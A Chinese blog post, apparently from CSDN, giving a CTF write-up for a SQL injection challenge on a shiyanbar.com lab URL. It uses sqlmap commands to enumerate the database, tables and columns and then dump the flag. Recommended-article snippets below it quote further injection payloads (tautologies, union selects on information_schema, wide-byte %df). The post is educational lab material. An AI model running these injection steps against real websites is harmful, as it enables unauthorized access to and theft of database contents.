ctf题库--简单的sql注入③

最新推荐文章于 2024-07-08 15:41:07 发布
最新推荐文章于 2024-07-08 15:41:07 发布
阅读量5.8k 收藏 24
点赞数 2
分类专栏: 其它 文章标签: ctf题库 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miko2018/article/details/83315828
版权

<题目>
mysql报错注入
格式:flag{}
解题链接: http://ctf5.shiyanbar.com/web/index_3.php
<解答>
1.打开题目链接,在查询中输入1,发现地址栏变化。
1
2.认为这里可能(看题目其实知道是一定)存在一个sql注入。
3.使用工具sqlmap进行注入(以该地址栏id值为例)。

  • 查看当前数据库:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db 1

  • 查看(猜解)表:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 --tables
2

  • 查看(猜解)flag表的列:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -columns
3

  • 将flag表中的flag值dump一下:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -C flag --dump

即可得到最终的值:
4

后记:如果不熟悉sqlmap,则最先应记住几个常用的注入语句和常见的注入方法,必要时也可以考虑手工注入。

bubblecode
关注
  • 2
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF」-「SQL」- 简单SQL注入1
小落的博客
10-26 612
简单SQL注入1 测试注入点 测试过滤规则 简单的添加一个union,发现没有过滤 (1union 这怎么有点像php弱类型了) 在union加一个空格以及一个and,发现union被过滤,那么可以猜测他的过滤规则和两端的空格有关。、 3. 查看到底有几个关键词被过滤了 1 union select group_concat(table_name) from informa...
一道简单sql注入题目
weixin_44215027的博客
11-05 1998
一道简单sql注入题目 好久都没有做ctf题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
sql漏洞注入利用_网络安全面试题-SQL注入问题总结_新手漏洞教学
最新发布
2401_84915584的博客
07-08 745
一、知识储备类 1.SQL与NoSQL的区别?SQL:关系型数据库 NoSQL:非关系型数据库存储方式:SQL具有特定的结构表
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1401
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
决斗场 - 实验吧 WEB 简单sql注入
RaAlGhul的博客
11-14 2097
题目链接:http://www.shiyanbar.com/ctf/1875 题目提示:通过注入获得flag值。 点开题目,又是一个简洁的界面让我一脸懵逼(0.0) 好吧,开始我们的注入之旅。 首先,随便往框里面输入字符和数字,发现当输入1、2、3的时候有查询结果。 接下来进行注入的第一步测试,输入一个带单引号的数据,目的是测试是否对构造SQL的字符串进行了过滤。当把带有
实验吧ctf-web题:简单sql注入
热门推荐
Elvira
08-25 1万+
简单sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
简单SQL注入
stars77的博客
12-18 621
简单SQL注入 题目进入显示如下 0X01 手工注入 登录框里有个公告,感觉是突破口,点进去后显示如下 在这里测试是否有注入点 一、判断是否存在注入 id=2 and 1=1 id=2 and 1=2 adodb.field 错误 ‘80020009’ bof 或 eof 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 /new_list.asp,行 0 说明...
CTF-实验吧简单sql注入
才不是小弱鸡的博客
05-07 1665
好吧,其实这题我也是看了wp才知道的写wp的老哥个个都是人才,脑洞很大,知识丰富,还会嘤嘤嘤,我超喜欢的。咳咳咳,跑题了,这题一看就是sql注入嘛(别问我为什么知道,自己看题目名)先进行过滤测试。先试试1 and 1=1,发现返回显然and被过滤了然后继续测试,结果发现sql语句基本上都被过滤了QAQ看wp发现这里其实是过滤后面带有空格的关键字了解这个就可以开始愉快的注入了先查一下数据库 1'/*...
后台登录(实验吧CTF题库-WEB)
MyCyber
05-20 3968
后台登录(实验吧CTF题库-WEB) 题目概述 分值:10 难度:易参 解题通过率:94% 格式:flag:{xxx} 题目链接:http://www.shiyanbar.com/ctf/2036 参考解题步骤 1、首先,我们先查看一下网页源码,发现其中有以下注释内容 $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE u...
ctf 选择题 题库_实验吧CTF题库-WEB题(部分)
weixin_39613548的博客
12-19 1226
看起来有点难提交adminhttp://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login用sqlmap检测是否有注入┌─[root@sch01ar]─[/sch01ar]└──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/injec...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
1. **SQL注入**:参赛者需要了解如何利用不安全的SQL查询来获取敏感信息,以及如何防御这类攻击,如参数化查询、输入验证和使用预编译语句。 2. **XSS(Cross Site Scripting)**:试题可能包含对XSS漏洞的利用,如...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
精品分享-CTF比赛培训视频及往年题库解析合集(50份).zip
03-05
精品分享-CTF比赛培训视频及往年题库解析合集,共50多份资料。...CTF-第三周:信息泄露、sql注入、文件上传、常见CTF web题型及解析技巧 CTF-第四周:重点漏洞分析、金融安全案例剖析、移动安全、二进制等
CTF-入门练习题
10-30
攻击者可能试图寻找系统漏洞,进行SQL注入、XSS跨站脚本攻击、命令注入等;而防御者则要强化系统安全性,防止这些攻击。通过练习,参与者可以了解网络攻防的策略和技巧,包括如何识别和防范潜在威胁。 【蓝盾服务器...
SQL注入入门题[极客大挑战 2019]
qq_51439282的博客
12-06 459
[极客大挑战 2019]EasySQL题目就知道是sql注入,还说是很简单的,那倒要看看有多简单 打开网页在账号密码那都输入上’1看看果然有明显的回响,然后输入一下我们的永真语句试试好家伙,真就简单的直接出flag了 最近也在学一写sql注入的内容,看了几期视频,发现在构造1' or 1 = 1#’时,sql代码本身是自带有' '两个引号的然后你加入1'之后他就会与前面的单引号自动闭合'1''输入之后就会得到这样的结果,多出了一个单引号,也正是这个原因我们可以通过加'来判断这个是否存在sql注入,如果存
南邮CTF--SQL注入
weixin_34219944的博客
05-18 323
南邮CTF--SQL注入题目:GBK SQL injection 解析: 1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入 2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功 3.继续改参数,1=2时,没有任何信息,找到注入点 4.利用order by 查询列数,当查询2时,显...
CTF-web题之简单SQL注入
qq_25046827的博客
11-24 5180
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
SQL注入题目
Pvr1sC的博客
03-17 833
极客大挑战2019 EasySQL 简单题,'发现注入点 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 写入1’ or 1=1 # [强网杯 2019]随便注 堆叠注入 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以
CTF实验吧简单sql注入。自己写的wp!
qq_41326328的博客
05-04 1419
这次来写了一个wp,我是小白希望大神们可以指点,因为自己是一个人搞sql,有人指点能够少走很多弯路。 先看这一题,我刚进来居然还来了个乱码,不管了开始,看到这题目,命令注入得到flag,就想这一题无非就是绕过过滤,进行爆库爆数据得到flag 输入1,2,3以后,得到一些表名,这时就在猜想后台sql查询语句为:select name where id =xxxxx; 先判断注入点 先用1 an...
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值